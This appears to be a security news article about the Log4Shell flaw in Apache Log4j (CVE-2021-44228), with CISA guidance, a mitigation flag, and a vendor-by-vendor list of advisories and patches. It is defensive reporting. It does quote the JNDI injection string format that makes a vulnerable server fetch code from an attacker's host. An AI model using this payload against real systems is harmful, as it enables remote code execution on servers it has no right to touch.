List of Log4j vulnerability advisories, patches, and updates

News about a critical vulnerability in the Apache Log4j logging library broke last week when proof-of-concept exploits started to emerge on Thursday.

Log4j is an open-source Java logging framework part of the Apache Logging Services used at enterprise level in various applications from vendors across the world.

Apache released Log4j 2.15.0 to address the maximum severity vulnerability, currently tracked as CVE-2021-44228, also referred to as Log4Shell.

While massive exploitation started only after exploit code became freely available, attacks have been detected since the beginning of the month, according to data from Cloudflare and Cisco Talos.

The Log4Shell flaw was reported by Alibaba’s Cloud security team on November 24 and it is unclear how some attackers were able to exploit it this soon.

In a statement on Saturday on the Log4Shell vulnerability, Jen Easterly, the director of the Cybersecurity and Infrastructure Security Agency (CISA), says that the agency is working with partners in the private and public sector to address the issue.

“We are taking urgent action to drive mitigation of this vulnerability and detect any associated threat activity. We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies -- and signals to non-federal partners -- to urgently patch or remediate this vulnerability” - Jen Easterly, Director of CISA

Log4Shell is a Java Naming and Directory Interface (JNDI) injection that allows unauthenticated remote code execution. Adversaries can leverage it by changing the user-agent in their browser to a string in the following format: ${jndi:ldap://[attacker_URL]}.

The string will remain in the victim web server's logs and will force a callback or request to the attacker's URL when the Log4j library parses it. Attackers can use the string to pass encoded commands or Java classes to the vulnerable machine.

source: Radware

Advisories, notices, patches, or updates

Given the severity of the vulnerability and how easy it is to exploit it, CISA today released guidance for companies to set up defenses against Log4Shell attacks. The agency's recommendation is to "apply available patches immediately" and to prioritize this process.

"Prioritize patching, starting with mission critical systems, internet-facing systems, and networked servers. Then prioritize patching other affected information technology and operational technology assets" - CISA

If patching is not possible, the agency recommends the following change:

Set log4j2.formatMsgNoLookups to true by adding the string -Dlog4j2.formatMsgNoLookups=True to the Java Virtual Machine command for starting an application

This comes with the caveat that the system's logging may be impacted if it relies on Lookups for message formatting. Also, the mitigation works only for versions 2.10 and later.

Immediately after details about Log4Shell became known, vendors started to investigate if their products are impacted and provided information about the results:

Adobe:

Adobe determined that ColdFusion 2021 is vulnerable to Log4Shell and addressed the security risk in an update released on December 14. A workaround is available if patching is not possible right away.

Amazon:

Amazon has updated several of its products to use a non-vulnerable version of the Log4j component and announced that it is either in the process of updating others or will release new versions shortly.

The company has published details specific for affected services, among them being OpenSearch, AWS Glue, S3, CloudFront, AWS Greengrass, and API Gateway.

Atlassian:

Based on its assessment, the company believes that no on-premise products are vulnerable to exploitation in their default configuration.

Modifying the default logging configuration (log4j.properties) to enable the JMS Appender functionality may bring the risk of remote code execution in some products, like Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, and Crucible.

Broadcom:

The company published mitigations and knowledgebase articles for several Symantec products affected by the Log4j vulnerability. These include CA Advanced Authentication, Symantec SiteMinder (CA Single Sign-on), VIP Authentication Hub, and Symantec Endpoint Protection Manager (SEPM).

Cisco:

Cisco has published a list of its products affected by Log4Shell along with a calendar for patching some of them starting December 14.

Affected products are from various categories, including the following:

  • Network and content security devices (Identity Services Engine, Firepower Threat Defense, Advanced Web Security Reporting Application)
  • Collaboration and social media (Cisco Webex Meetings Server)
  • Network management and provisioning (Cisco CloudCenter Suite Admin, Data Center Network Manager, IoT Control Center, Network Services Orchestrator, WAN Automation Engine)
  • Enterprise routing and switching (Cisco Network Assurance Engine and Cisco SD-WAN vManage)

Citrix:

While the investigation is still underway and the status may change for some of its products, Citrix has not listed any of its products as being vulnerable to Log4Shell.

ConnectWise:

The company's cloud service, Perch, was found to rely on third-party components that were "potentially vulnerable," reads an advisory from ConnectWise.

The vulnerable third-party was identified as FortiGuard's FortiSIEM, which is used by ConnectWise's StratoZen solution, prompting the company to temporarily restrict access to the hosted StratoZen servers. Access is now restored to most of the services.

cPanel:

A forum thread shows that only instances where the cPanel Solr plugin is present are affected and could be exploited, but only locally.

A staff member provided additional peace of mind announcing that an update with mitigation for Log4Shell is available to the cpanel-dovecot-solr package.

Debian:

The patched Log4j package has been added to Debian 9 (Stretch), 10 (Buster), 11 (Bullseye), and 12 (Bookworm) as a security update, reads the advisory.

Docker:

A dozen Docker Official images have been found to use a vulnerable version of the Log4j library. The list includes couchbase, elasticsearch, logstash, sonarqube, and solr.

Docker says that it is “in the process of updating Log4j 2 in these images to the latest version available” and that the images may not be vulnerable for other reasons.

FortiGuard:

An advisory from the company lists almost a dozen of its products as being vulnerable, with fixes or mitigations already deployed for four of them.

FortiGuard announced that the advisory would be updated with the dates for applying fixes for other products, such as FortiSIEM, FortiInsight, FortiMonitor, FortiPortal, FortiPolicy, and ShieldX.

F-Secure:

Both Windows and Linux versions of several F-Secure products are impacted by Log4Shell: Policy Manager (only the Policy Manager Server component), Policy Manager Proxy, Endpoint Proxy, and Elements Connector.

The company has created a security patch for administrators to correct the issue and provided step-by-step instructions to deploy it.

Ghidra:

The open-source reverse engineering tool from the NSA received an update to version 10.1 that also upgrades the Log4j dependency to a non-vulnerable iteration.

IBM:

IBM’s advisory for Log4Shell shows that only WebSphere Application Server versions 9.0 and 8.5 were affected by the vulnerability, via the Admin Console and the UDDI Registry Application components, and that the issue has been addressed.

Juniper Networks:

The networking company disclosed that four of its products are impacted: Paragon Active Assurance, Paragon Insights, Paragon Pathfinder, and Paragon Planner.

While the assessment continues, at this stage another six products may be affected: JSA Series, Junos Space Management Applications, Junos Space Network Management Platform, Network Director, Secure Analytics, and Security Director (not Security Director Insights)

McAfee:

The company has yet to complete its assessment and has 12 products under review and will update the advisory with relevant information as it becomes available.

MongoDB:

Only MongoDB Atlas Search needed to be patched against Log4Shell, the company notes in an advisory updated today

The developer adds that it found no evidence of exploitation or indicators of compromise before deploying the patch.

Okta:

Okta released updates for Okta RADIUS Server Agent and Okta On-Prem MFA Agent to mitigate the risk from the Log4Shell vulnerability and strongly recommends customers to apply the fixes from the Admin Console.

Oracle:

Oracle said that “a number” of its products, without disclosing which ones or how many, are using a vulnerable version of the Log4j component.

The company referred its customers to the My Oracle Support Document and released a security alert with a strong recommendation to apply the provided updates “as soon as possible.”

OWASP Foundation:

An advisory on Friday revealed that versions of the Zed Attack Proxy (ZAP) web app scanner below 2.11.1 use a vulnerable Log4j component.

Red Hat:

Components in multiple Red Hat products are affected by Log4Shell, the organization disclosed on Friday, strongly recommending customers to apply the updates as soon as they become available.

Among the products listed in the advisory are Red Hat OpenShift 4 and 3.11, OpenShift Logging, OpenStack Platform 13, CodeReady Studio 12, Data Grid 8, and Red Hat Fuse 7.

Siemens:

The company found multiple products to be vulnerable to Log4Shell. The issue has been fixed in some products while for others tests are being carried out for long-term solutions.

Customers are recommended to update Siemens software to the most recent version or apply the workarounds and mitigations the company provided in its advisory as well as follow the general security guidance.

SolarWinds:

Two products from the company use a vulnerable version of Apache Log4j: Server & Application Monitor (SAM) and Database Performance Analyzer (DPA).

However, both products use a version of the Java Development Kit (JDK) that is either not susceptible to the Logj4 vulnerability or reduces the risk.

SonarSource:

An ElasticSearch component in SonarQube uses the Log4j library and the company provides mitigation to avoid any risk. A fix, if necessary, will become available.

Out of an abundance of caution, SonarSource updated SonarCloud to run a non-vulnerable version of Log4j, although the product there "was not directly susceptible to this vulnerability."

SonicWall:

An ongoing investigation revealed that SonicWall’s Email Security version 10.x is impacted by the Log4Shell vulnerability. A fix is under development and should be released “shortly.”

Five other products from SonicWall are still under review and the rest of them are not to impacted by the issue, according to an advisory from the company last updated on Saturday.

Sophos:

The company found that Sophos Mobile EAS Proxy is vulnerable and recommends customers download version 9.72 to address the issue.

Sophos Email and Cloud Optix have been patched before threat actor attempts to exploit the vulnerability.

Splunk:

Core Splunk Enterprise is not affected unless Data Fabric Search is used. The company published a table with the versions of its products affected by Log4Shell both in the cloud and on-premise.

At the time of writing, the company has released fixes for some products and is currently working on rolling updates for at least seven of its products.

TrendMicro:

Most products are not affected by the Log4Shell vulnerability. A small number of services affected have been patched: Vision One, Trend Micro Email Security & HES, TippingPoint Threat Management Center (TMC), Sandbox as a Service, and Cloud App Security.

VMware:

VMware has fixed several of its products vulnerable to Log4Shell attacks and is currently working to roll out patches for another 27 products.

In an advisory last updated today, the company lists nearly 40 of its products as impacted by the critical vulnerability. Many of them show a “Patch Pending” and mitigations are available in some cases.

Ubiquiti:

The UniFi Network Application, which uses the Log4j library, has been updated to address the critical Log4Shell vulnerability.

Ubuntu:

The Log4j package has been patched upstream, reads the security advisory, and the update now has to trickle to Ubuntu 18.04 LTS (Bionic Beaver), 20.04 LTS (Focal Fossa), 21.04 (Hirsute Hippo), and 21.10 (Impish Indri).

    Zoho:

    The company found that the ADAudit Plus component for auditing Active Directory changes, which is part of the ManageEngine monitoring solution is vulnerable to Log4Shell attacks.

    In a short post today, Zoho has provided instructions to mitigate the issue.

    Zscaler:

    Zscaler has patched several of its products that used a vulnerable version of the Log4j library. After patching all of its Private Access (ZPA) services facing the public internet, Zscaler Mobile Admin, and Support Mobile Admin components, the company concluded that the issue has been fixed in all its products.

    The above is not an exhaustive list of vendors that are investigating or have fixed their products against Log4Shell. A more comprehensive inventory is available from the Dutch Nationaal Cyber Security Centrum, in its GitHub repository for known vulnerable/not vulnerable software.

    CISA has also aggregated vendor-supplied advisories on the Log4j vulnerability from public sources and makes it available on GitHub as well.

    Some companies may choose not to take action against Log4Shell vulnerability believing that running certain Java versions diffuses any exploit attempt. This is not true, though, and they should update the Log4j library to its most recent iteration.

    Márcio Almeida, a senior security engineer at Canva graphic design platform warns that Log4Shell attacks work with any version of Java when adding support for LDAP serialized payloads in the JNDI exploit kit.

    JNDI exploit for Log4Shell flaw works with any version of java
    source: Márcio Almeida

    The researcher explains that for the attack to work with any version of Java the classes used in the serialized payload need to be in the application classpath.

    Related Articles:

    Juniper releases out-of-cycle fix for max severity auth bypass flaw

    Critical GitLab bug lets attackers run pipelines as any user

    Dev rejects CVE severity, makes his GitHub repo read-only

    Exploit for critical Fortra FileCatalyst Workflow SQLi flaw released

    Hackers target new MOVEit Transfer critical auth bypass bug